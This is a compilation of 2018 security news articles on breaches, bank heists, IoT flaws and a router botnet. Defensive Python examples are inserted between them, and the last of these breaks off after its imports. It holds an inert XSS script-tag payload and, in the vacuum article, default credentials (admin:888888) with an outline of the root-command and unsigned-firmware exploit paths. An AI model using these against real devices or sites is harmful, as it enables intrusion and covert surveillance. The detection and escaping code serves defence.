Following the disclosure, Adobe included Vulnerability Lab on its industry partners page, which also lists CERT/CC, FireEye, Microsoft, Google, Tencent, Qihoo 360, Kaspersky, Palo Alto Networks and others.

The researchers said there were multiple domains where malicious code could have been inserted and there were multiple places where the code would be executed.

“The code was injected to a micro service, from there it was taken to the main application management service. Then it was synced into the main lead database of Adobe and we had several domains where we were able to place our codes with executable content,” explained Benjamin Kunz Mejri, CEO and founder of Vulnerability Lab.

The exploit code was delivered via emails sent out by Adobe and on some of the company’s domains, Kunz Mejri said.


Vulnerability Lab has published a blog post and an advisory to describe the vulnerability.
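The article describes a persistent XSS: a value submitted through a registration form is stored, synced into a lead database and later interpolated into emails and web pages. The following is an added example (not code from Adobe or Vulnerability Lab) showing the defect in its simplest form beside the fix: the same stored record rendered once by direct string interpolation and once with every value escaped for an HTML text context. The field names and template are assumptions, and the payload is a constructed, inert marker.

```python
"""Stored XSS through a registration form: the unescaped render beside the escaped one.

Added example, not code from Adobe or Vulnerability Lab. The form field names and
the HTML template are assumptions; the payload is a constructed, inert marker.
"""
import html
import re

# Constructed registration submission: the "name" field carries a script tag, the kind
# of value that, once stored, ends up in generated web pages and outbound emails.
SUBMISSION = {
    "name": "Jane <script>alert(1)</script> Doe",
    "company": "Example & Co",
    "email": "jane@example.test",
}

TEMPLATE = "<p>Hello {name} from {company}, see you at the event. Reply to {email}.</p>"


def render_vulnerable(fields):
    """Interpolates stored values straight into HTML: the stored payload becomes live markup."""
    return TEMPLATE.format(**fields)


def render_safe(fields):
    """Escapes every stored value for an HTML text context before interpolation.

    html.escape handles &, <, > and (with quote=True) both quote characters, which is
    the right treatment for text nodes and quoted attribute values; URL or JavaScript
    contexts need their own encoders."""
    escaped = {k: html.escape(v, quote=True) for k, v in fields.items()}
    return TEMPLATE.format(**escaped)


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_active_markup(rendered):
    """Crude demonstration check: does the rendered output contain a real <script> tag?"""
    return bool(SCRIPT_TAG.search(rendered))


if __name__ == "__main__":
    print(render_vulnerable(SUBMISSION))
    print(render_safe(SUBMISSION))
```

The point of the article's case is that escaping must happen at every output point, not just at the form that first receives the value: a record that was stored unescaped and later rendered by a separate email or web service is exactly the propagation path described above.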


Singapore Says Hackers Stole 1.5 Million Health Records in Massive Cyberattack
22.7.2018 securityweek Incident

Hackers have stolen the health records of 1.5 million Singaporeans including Prime Minister Lee Hsien Loong, authorities said Friday, with the leader specifically targeted in the city-state's biggest ever data breach.

Singapore's health and information ministries said a government database was broken into in a "deliberate, targeted and well-planned" strike, describing the attack as "unprecedented".

"Attackers specifically and repeatedly targeted the personal particulars and outpatient information of Prime Minister Lee Hsien Loong," health minister Gan Kim Yong told a press conference.

Forensic analysis by Singapore's Cyber Security Agency "indicates this is a deliberate, targeted, and well-planned cyber-attack and not the work of casual hackers or criminal gangs," he added.

Officials declined to comment on the identity of the hackers, citing "operational security", but said the prime minister's data has not shown up anywhere on the internet.

"I don't know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret, or at least something to embarrass me," Lee wrote on Facebook.

"My medication data is not something I would ordinarily tell people about, but there is nothing alarming in it."

Hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The compromised data includes personal information and medication dispensed to patients, but medical records and clinical notes have not been affected, the health and communications ministries said.

"Health records contain information that is valuable to governments," said Eric Hoh, Asia-Pacific president of cyber-security firm FireEye.

"Nation-states increasingly collect intelligence through cyber-espionage operations which exploit the very technology we rely upon in our daily lives."

Earlier this month, the US National Intelligence Director Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the cyber-attack. A former judge will head a committee looking into the incident.

While the city-state has some of the most advanced military weaponry in the region, the government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their basements to nation-states.

In his Facebook post about the attack, Loong warned that "those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying."

In 2017, hackers broke into a defence ministry database, stealing the information of some 850 Singapore army conscripts and ministry staff.


A Cyber Axis of Evil is Rewriting the Cyber Kill Chain
22.7.2018 securityweek Cyber

Survey of Incident Responders Shows That Businesses Need to Re-architect Cybersecurity

The cyber kill chain employed by advanced adversaries is changing. Defenders need to evolve their defensive strategies to meet the new challenge; and they need to develop silent hunting skills.

A new study from Carbon Black queried 37 incident response firms that use its threat hunting tool to gain insight into what is happening after an attacker has breached the network. "The inspiration for this report," Tom Kellermann, the author and chief cybersecurity officer at Carbon Black told SecurityWeek, "was, I was tired of seeing reports that are focused on just the vector of attack -- how they got in versus how they stay in. There has been a dramatic shift in how cybercriminals operate -- they have moved from burglary to home invasion, and we now need to be asking different questions. The adversaries are typically inside networks for months."

Key statistics from the report picked out by Kellermann include the predominance of Russia and China as adversaries. Eighty-one percent of respondents highlighted Russia, and 76% highlighted China. Thirty-five percent say that the end goal is espionage.

Sixty percent of the attacks involve lateral movement, indicating that attacks are no longer smash and grab incidents -- adversaries are now intending to stick around for the long game. This is confirmed by the appearance of incident response countermeasures. Nearly half of the respondents have seen instances of counter-incident response. Sixty-four percent have seen instances of secondary C2 being used on a sleep cycle during their IR engagements. Thirty-six percent of attackers use the victim for island hopping; that is, as a supply chain attack. And -- perhaps worryingly -- 10% have witnessed non-ransomware destruction.

"I think the destruction figure is quite worrying if it grows," Kellermann told SecurityWeek; noting that there are already signs that it is doing so. He suggested three primary motivations: activism (possibly patriotic), revenge (for being discovered), and the destruction of forensic evidence. "There's a fundamental lesson we need to take away from this," he said: "we have to become more clandestine and more quiet when we hunt the adversary in our homes. We can no longer shout out, 'I know you're in my house; I've called the police'. That is exactly what Crowdstrike did when it was responsible for investigating the DNC breach, it was too loud in its incident response which is why the Russians dug and burrowed in deeper and deeper -- and that was evidenced in the indictments."

The biggest single takeaway that Kellermann has from this survey is that the way to counter the new long-term, advanced and evasive incursions is to develop silent hunting techniques. If hunting is too noisy, the adversary will simply burrow deeper, employ incident-response countermeasures, or simply destroy the network and leave.

"This evolution coincides with mounting geopolitical tensions," suggests the report. "Nation-states such as Russia, China, Iran and North Korea are actively operationalizing and supporting technologically advanced cyber militias."

Kellermann believes that this new level of attack sophistication is down to the increasing level of nation-state hacking -- although the hacking itself may be done by a national militia rather than direct government employees. "We're seeing cybercriminals act as cyber militias for nation states," he explained.

Take Russia and the GRU units indicted by Deputy Attorney General Rosenstein as an example. "Those GRU units typically in the past didn't have any real level of cyber-attack sophistication. The Silicon Valley of cyber-attack sophistication in Russia was St Petersburg -- so they called upon great cybercriminals like Alexsey Belan and Evgeniy Bogachev to essentially arm them with the greatest zero-day attack code and exploit kits in addition to showing them how to morph and change their kill chain."

The Chinese adversaries are also learning and adapting. "The Chinese," he said, "having learned from the mistakes of their past, where they never practiced good operational security and they were typically too loud when they broke into networks... well, they're becoming much more clandestine and much more elegant in the way they attack corporations. Particularly," he added, "in using island hopping -- as evidenced by the Cloud Hopper campaign where they targeted the MSPs of a dozen major corporations in the West. After compromising the MSPs they then leapfrogged into the corporate networks via their cloud infrastructure for the purposes of economic espionage."

The coincidence of changing and more advanced attacks with the rise of nation state actors is compelling; but whether it is primarily Russia and China depends on the accuracy of attribution.

"This attribution comes from the incident response responders to the survey," says Kellermann. "These folks typically worked in British or US intelligence or law enforcement communities; and they understand the fingerprints, the TTPs associated with specific threat actor groups, and the modus operandi. Not only that, you can typically see the C&Cs and the secondary C&Cs leveraging back to infrastructure that is operated or controlled by specific entities."

Kellermann believes there really is -- effectively -- a cyber axis of evil, primarily comprising Russia, China, North Korea, and to a lesser extent, Iran. The first three have an unwritten operational agreement not to target each other. "None of these three will hack the others, and at the same time they are benefitting from each other's colonization of wide swathes of the West."

Russia and North Korea are particularly close. "Both Russia and North Korea are counteracting economic sanctions imposed by the West with cybercrime against the financial sector," he said. "North Korea itself has become much more adept and sophisticated with their cyber-attacks as they are mirroring the Russian kill chain, and they are using more and more exploits and more and more custom malware. Just as the North Korean missile systems are typically based on Russian missiles, so you have the same amount of tech transfer in cyber capabilities."

He sees no reduction in cyber-attacks from any of these countries, and expects South China Sea tensions and the potential for global trade wars to simply exacerbate the problem. "In fact," he said, "the new group Hidden Cobra has been quite prolific -- you just don't hear much about them because the financial institution victims are trying to keep this conversation quiet. But Hidden Cobra is the greatest testament to the advancement of cyber capabilities in North Korea."

Nor does he exclude Iran from this group, pointing out that as long ago as the Stuxnet issue, it was Russia that Iran turned to for, and received from, cyber assistance. There are even suggestions that Russian experts analyzed Stuxnet and returned it to Iran in the form of the original Shamoon malware used against Saudi Aramco.

But Kellermann doesn't think an understanding of the source of the attacks is as important as an understanding of how they are being operated. "I really think that the indications of counter incident response are the powerful statistics; and that 36% of the attacks are not directed against the initial victim -- basically, after they've done stealing from you they're going to use your network to target people that trust you. That has to be something we are acutely aware of and cognizant of in how we structure business partnerships, and in how we secure our information supply chain going forward."

He feels that the U.S. is currently suffering under an Administration that is not sufficiently focused on cyber security. "Not only does the US not even have a Cyber Czar, but this Administration has not taken cyber security seriously -- as evidenced by the rapid retirement rate of professionals who would have been lifers under a different administration. I am incredibly concerned that we're dealing with an adversary that has already colonized wide swathes of British and American infrastructure, and we're really fighting someone from the inside out."

He believes that the real message coming from this survey of incident responders is that business needs to re-architect its cybersecurity. "We need to change the architectural model away from a castle-like structure and more towards that of a prison, where we can force the adversary to be resourced constrained, where we inhibit their capacity to move laterally and we hunt them and monitor them without them knowing that we're doing so. That's the type of environment we need to migrate to -- I call that environment 'intrusion suppression'."

To achieve this, he believes that business must move to silent hunting. "This could be done with iron boxing, modern whitelisting, next gen AV that includes endpoint detection and response, and deception technology. Hunt tools need to be more widely deployed. Memory augmentation should be employed, and adaptable authentication based on the level of risk can enforce 2 or 3 factor authentication with a biometric live challenge/response, all depending on the level of risk. Existing outward-facing network defenses are largely failing. The modern network has really evolved to cloud and mobility which makes the security of the endpoints paramount, and the capacity to record and monitor all activity on the endpoints is absolutely quintessential to success."


DOJ Cybersecurity Task Force Outlines Plans for Protecting Elections
22.7.2018 securityweek Cyber

The U.S. Justice Department’s Cyber-Digital Task Force made public its first report on Thursday, covering the threat to elections, cybercrime schemes, and various other topics.

The role of the Cyber-Digital Task Force, announced in February by the Attorney General, is to help the Department of Justice find ways to combat cyber threats and become more efficient in this area.

The task force focuses on election interference, critical infrastructure disruptions, use of the Internet for spreading violent ideologies and recruiting followers, botnets, the use of technology designed to hide criminal activities, and the theft of sensitive data.

The first chapter of the 156-page report focuses on what the Attorney General describes as “one of the most pressing cyber-enabled threats” confronting the U.S., specifically “malign foreign influence operations” and their impact on elections and other democratic institutions.

The types of threats described in the report include operations targeting voting machines, voter registration databases and other election infrastructure; operations targeting political entities; and covert influence operations whose goal is to harm political organizations and public officials.

The report specifically names Russia and cites the recent indictments related to the hacking of the Democratic National Committee (DNC) and attempts to influence the 2016 presidential election.

Authorities are also concerned about disinformation operations that abuse social media and other forums to influence public opinion and sow division, and overt influence operations that involve lobbyists and foreign media.

The report also focuses on the upcoming midterm elections, which intelligence officials believe will be targeted by Russia. The Kremlin is expected to apply lessons learned from the campaign aimed at the 2016 election.

The task force has outlined plans to combat threats to the 2018 midterm elections, including ballot fraud, for which authorities believe the risk is real, despite no evidence of successful attempts.

The report also describes a framework for countering malign foreign influence operations aimed at the midterm elections.

Microsoft representatives revealed this week that the company already identified election-related hacking attempts. The tech giant spotted some phishing websites that appeared to be aimed at three unnamed congressional candidates.

“The Department of Justice plays an important role in combating foreign efforts to interfere in our elections, but it cannot alone solve the problem. There are limits to the Department’s role—and the role of the U.S. government—in addressing foreign influence operations aimed at sowing discord and undermining our Nation’s institutions,” the task force noted. “Combating foreign influence operations requires a whole-of-society approach that relies on coordinated actions by federal, State, and local government agencies; support from potential victims and the private sector; and the active engagement of an informed public.”

The next two chapters of the report are dedicated to cybercrime schemes, including damage to computer systems, fraud, data theft, threats to privacy (e.g. sextortion), and critical infrastructure attacks.

Chapter 4 of the report shows how the FBI responds to cyber threats, and Chapter 5 describes the Department of Justice’s efforts on training and managing its workforce.

The complete report is available from the DOJ in PDF format.


Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.2018 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

The Finland and Singapore cyber-attacks showed some similarities in targeted ports, which included SIP port 5060, which is typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often ship devices with easily guessable credentials, which turns these products into easy targets for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind the top targeted countries. Compared to Canada, which typically makes it into the top 10 but not the top 5, Finland received only a small fraction of cyber-attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.
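F5 attributes most of the Finland traffic to password brute forcing against SSH and similar services on devices still using vendor-default credentials. The following is an added example (not code from F5 or the article) of the detection a defender would run on the receiving end: it parses OpenSSH's default syslog lines, counts failed password attempts per source inside a sliding time window, and reports sources that cross a threshold along with the usernames they tried. The log lines are constructed in the standard sshd format; the hostname, the RFC 5737 test addresses, the threshold and the window are assumptions.

```python
"""Flag SSH password brute forcing from sshd log lines.

Added example, not code from F5 or the article. The log lines are constructed in
the default OpenSSH syslog format; the hostname, IPs (RFC 5737 test ranges),
threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one source hammers root/admin/pi within seconds, a second source
# fails once after a successful key login, and the first source returns minutes later.
SAMPLE_LOG = """\
Jul 13 02:14:01 edge sshd[4021]: Failed password for root from 203.0.113.5 port 51234 ssh2
Jul 13 02:14:02 edge sshd[4023]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Jul 13 02:14:02 edge sshd[4025]: Failed password for invalid user admin from 203.0.113.5 port 51238 ssh2
Jul 13 02:14:03 edge sshd[4027]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jul 13 02:14:04 edge sshd[4029]: Failed password for invalid user pi from 203.0.113.5 port 51242 ssh2
Jul 13 02:14:05 edge sshd[4031]: Accepted publickey for ops from 198.51.100.7 port 40022 ssh2
Jul 13 02:14:07 edge sshd[4033]: Failed password for ops from 198.51.100.7 port 40024 ssh2
Jul 13 02:20:00 edge sshd[4040]: Failed password for root from 203.0.113.5 port 51300 ssh2
"""


def parse_failures(log_text, year=2018):
    """Yield (timestamp, ip, user) per failed password line. Syslog timestamps carry no
    year, so one is supplied by the caller."""
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"]


def brute_force_sources(log_text, threshold=5, window_seconds=60):
    """Return {ip: (max failures inside one window, sorted usernames tried)} for every
    source that produced at least `threshold` failed passwords within `window_seconds`."""
    per_ip = defaultdict(list)
    for ts, ip, user in parse_failures(log_text):
        per_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits in window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = (best, sorted({u for _, u in events}))
    return flagged


if __name__ == "__main__":
    for ip, (count, users) in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures within 60s, usernames tried: {users}")
```

The usernames list is the useful second signal: a single source cycling through root, admin and pi is trying vendor defaults rather than mistyping a real account, which is the pattern F5 describes. On the device side, the fix is the same regardless of detection: disable password authentication for SSH and require key-based logins.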


MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank
22.7.2018 securityaffairs Incident

The cybersecurity firm Group-IB is involved in the incident response on an attack on the Russian PIR Bank conducted by MoneyTaker hacking group.
The MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank. The cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

Crooks transferred the money to 17 accounts at major Russian banks and cashed out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB in order to respond to the incident and limit the damages.

According to the Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (a conservative estimate) from the Russian bank. PIR Bank officially confirmed the attack, but it was unable to determine the exact amount of money stolen by the attackers.

Even if the bank managed to delay the withdrawal of the stolen funds, most of them are lost.

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensic analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that MoneyTaker had used earlier in attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same as those used in previous attacks.

MoneyTaker is a cybercrime gang specializing in targeted attacks on financial institutions; in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group focuses on card processing and interbank transfer systems (AWS CBR and SWIFT).


The MoneyTaker group has been active at least since spring 2016, when it stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went dark for almost 4 months and resumed in September 2016, attacking only banks in Russia.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 2018, Group-IB tracked two MoneyTaker attacks in Russia.

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack: Group-IB confirmed that it started in late May 2018. The hackers gained access to the bank by compromising a router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

The MoneyTaker group uses PowerShell scripts to establish persistence in banks’ systems and to automate some stages of its attacks. Once the crooks had hacked the bank’s main network, they gained access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions involving large sums and quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.” added Group-IB.

“This is not the first successful attack on a Russian bank with money withdrawal since early 2018,” says Valeriy Baulin, Head of Digital Forensics Lab Group-IB, “We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 2018) – have their own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”
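Two of the MoneyTaker traits above leave traces a defender can alert on: clearing OS logs is itself logged by Windows (Security event 1102 when the audit log is cleared, System event 104 for other logs, both from the Microsoft-Windows-Eventlog provider), and the clear usually happens from an account the attacker already controls. The following is an added example (not code from Group-IB) that scans exported event records for these log-cleared events and groups them by host. The records are constructed dictionaries in the shape of an exported event; hostnames, account names and the "ClearedLog" field name are assumptions.

```python
"""Spot cleared Windows event logs, the anti-forensics step described in the MoneyTaker case.

Added example, not code from Group-IB. Records are constructed dicts in the shape of
an exported event (Channel, EventID, Provider, TimeCreated, Computer, plus a few
EventData fields); hostnames, accounts and the "ClearedLog" field name are assumptions.
"""
from datetime import datetime

# Windows records the act of clearing a log even though the cleared contents are gone:
# Security 1102 (the audit log was cleared) and System 104 (another log was cleared).
LOG_CLEARED = {("Security", 1102), ("System", 104)}

# Constructed sample: a service account logs on, then wipes the Security log and the
# PowerShell log a couple of minutes later; the surrounding events are ordinary noise.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4624, "Provider": "Microsoft-Windows-Security-Auditing",
     "TimeCreated": "2018-07-04T21:03:11", "Computer": "WS-BRANCH-07", "SubjectUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 1102, "Provider": "Microsoft-Windows-Eventlog",
     "TimeCreated": "2018-07-04T21:05:40", "Computer": "WS-BRANCH-07", "SubjectUserName": "svc_backup"},
    {"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog",
     "TimeCreated": "2018-07-04T21:05:41", "Computer": "WS-BRANCH-07", "SubjectUserName": "svc_backup",
     "ClearedLog": "Windows PowerShell"},
    {"Channel": "System", "EventID": 7036, "Provider": "Service Control Manager",
     "TimeCreated": "2018-07-04T21:06:00", "Computer": "WS-BRANCH-07"},
]


def cleared_log_events(events):
    """Return one finding per log-cleared event, oldest first."""
    findings = []
    for ev in events:
        if (ev.get("Channel"), ev.get("EventID")) in LOG_CLEARED:
            findings.append({
                "time": datetime.fromisoformat(ev["TimeCreated"]),
                "host": ev.get("Computer", "?"),
                "event_id": ev["EventID"],
                "account": ev.get("SubjectUserName", "?"),
                # 1102 always concerns the Security log; for 104 the cleared channel is
                # carried in the event data (field name assumed here).
                "cleared": "Security" if ev["EventID"] == 1102 else ev.get("ClearedLog", "?"),
            })
    findings.sort(key=lambda f: f["time"])
    return findings


def hosts_with_cleared_logs(events):
    """Return {host: number of log-cleared events}, a quick triage view across a fleet."""
    counts = {}
    for f in cleared_log_events(events):
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in cleared_log_events(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']}: {f['account']} cleared the {f['cleared']} log (event {f['event_id']})")
```

Because the attacker deletes the local history, this check is only useful when events are forwarded off the host before they can be cleared; a 1102 or 104 arriving at the collector with no matching change ticket is a strong signal on its own, and the account it names is the first pivot for the investigation.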


Experts disclose dangerous flaws in robotic Dongguan Diqee 360 smart vacuums
22.7.2018 securityaffairs Vulnerability

Positive Technologies discovered two flaws affecting Dongguan Diqee 360 smart vacuums that can be used to perform video surveillance.
Security researchers from Positive Technologies have discovered two vulnerabilities affecting Dongguan Diqee 360 smart vacuum cleaners that could be exploited by an attacker to run malicious code on a device with superuser privileges.

The flaws likely affect smart vacuum cleaners made by the company and sold under other brands as well; the experts believe the issue could also affect other Dongguan devices, including DVRs, surveillance cameras, and smart doorbells.

“Like any other IoT device, these robot vacuum cleaners could be marshalled into a botnet for DDoS attacks, but that’s not even the worst-case scenario, at least for owners. Since the vacuum has Wi-Fi, a webcam with night vision, and smartphone-controlled navigation, an attacker could secretly spy on the owner” reads the post published by Positive Technologies.

The two vulnerabilities have been tracked as CVE-2018-10987 and CVE-2018-10988; the former could be exploited by a remote attacker, while the latter requires physical access to the device.

The first bug can only be exploited by an authenticated attacker, but Positive Technologies says all Diqee 360 devices come with a default password of 888888 for the admin account, which very few users change, and which attackers can incorporate into their exploit chain.

smart vacuums

Once an authenticated attacker has discovered the vacuum on the network by obtaining its MAC address, a specially crafted UDP packet lets them execute commands on the vacuum cleaner as root. The bug resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153).

“An attacker can discover the vacuum on the network by obtaining its MAC address and send a UDP request, which, if crafted in a specific way, results in execution of a command with superuser rights on the vacuum.” reads the report published by the experts.

“The vulnerability resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153). To succeed, the attacker must authenticate on the device—which is made easier by the fact that many affected devices have the default username and password combination (admin:888888).”

The second vulnerability requires physical access: an attacker can load a tainted version of the firmware by inserting a microSD card into the vacuum.

“A microSD card could be used to exploit weaknesses in the vacuum’s update mechanism. After the card is inserted, the vacuum update system runs firmware files from the upgrade_360 folder with superuser rights, without any digital signature check. Therefore, a hacker could create a special script, place it on a microSD card in the upgrade_360 folder, insert this card, and restart the vacuum. This script could run arbitrary code, such as a sniffer to intercept private data sent over Wi-Fi by other devices.” states the post.

Positive Technologies responsibly reported the flaws in the smart vacuums to the vendor, giving it time to address the vulnerabilities; unfortunately, the researchers have no information about whether the vulnerabilities have been fixed to date.


Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours
22.7.2018 securityaffairs BotNet

The botmaster known as Anarchy has built a botnet of 18,000 Huawei routers in a few hours, and is also planning to target vulnerable Realtek routers.
NewSky Security first reported the birth of a new huge botnet: in just one day the botmaster compromised more than 18,000 Huawei routers.

NewSky Security researcher Ankit Anubhav announced that the botnet had already infected 18,000 routers. The disconcerting aspect of the story is that the hacker gathered such a huge number of devices in a limited period of time without using any zero-day issue.

The same botnet was today reported by experts from other security firms, including Qihoo 360 Netlab, Greynoise, and Rapid7.

360 Netlab
@360Netlab
We were tracking this botnet yesterday, the claimed 18000+ Huawei router number is probably inflated, as we were able to take a peek at the file which highly likely stored the infected ips, the total count was 10901. and attached is the graphic of the C2 for this botnet, big one.

Ankit Anubhav
@ankit_anubhav
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n

3:43 AM - Jul 19, 2018
The botmaster infected the devices by exploiting the CVE-2017-17215 vulnerability in Huawei HG532 routers. Experts noticed that the attackers started scanning for the flaw, which can be triggered via port 37215, on July 18.
Anarchy botnet
The botmaster is a hacker who goes by the moniker “Anarchy”; according to Anubhav he was previously identified as Wicked and was involved in the creation of the Mirai variant of the same name.

The Wicked Mirai botnet was first spotted by researchers at Fortinet, and Anubhav published on the NewSky blog an interview with the hacker.

Wicked/Anarchy is believed to be the threat actor behind other Mirai variants, including Omni and Owari (Sora).

As explained at the beginning of this post, Anarchy did not need any zero-day exploit to gather tens of thousands of devices in a few hours. CVE-2017-17215 is a well-known vulnerability that was used by many other botnets, including the Mirai variant Satori, to recruit zombies.

The CVE-2017-17215 vulnerability in the Huawei home router stems from the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to the WAN through port 37215 (UPnP, Universal Plug and Play).

The exploit code used to target the Huawei routers is publicly available; in December Ankit Anubhav found it on Pastebin.com.

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” stated a blog post published by Anubhav.

At the time, the exploit code for CVE-2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiru).

The availability of the code online represents a serious risk: it could become a commodity in the criminal underground, and vxers could use it to build their own botnets.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code; earlier in December, the author of the Brickerbot botnet, who goes by the moniker “Janitor”, released a dump which contained snippets of Brickerbot source code.

NewSky Security analyzed the code and discovered the use of the CVE-2017-17215 exploit, which means that the code had been available in the underground for a long time.

According to Bleeping Computer, Anarchy told Anubhav that he also plans to target the CVE-2014-8361 flaw in Realtek routers that is exploitable via port 52869.

“Testing has already started for the Realtek exploit during the night,” Anubhav told Bleeping Computer in a private conversation today. [Update: Both Rapid7 and Greynoise are confirming that scans for Realtek have gone through the roof today.]
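The two ports named above are all a defender needs to watch to see this kind of recruitment wave coming. The following Python script is an added example, not NewSky's, 360 Netlab's or Rapid7's code: it parses constructed, iptables-style firewall log lines (a hypothetical format) and flags any source that probes several distinct hosts on 37215/tcp or 52869/tcp inside a short window, which is what the July 18 Huawei scan and the Realtek test scan look like from the victim side.

```python
import re
from collections import defaultdict
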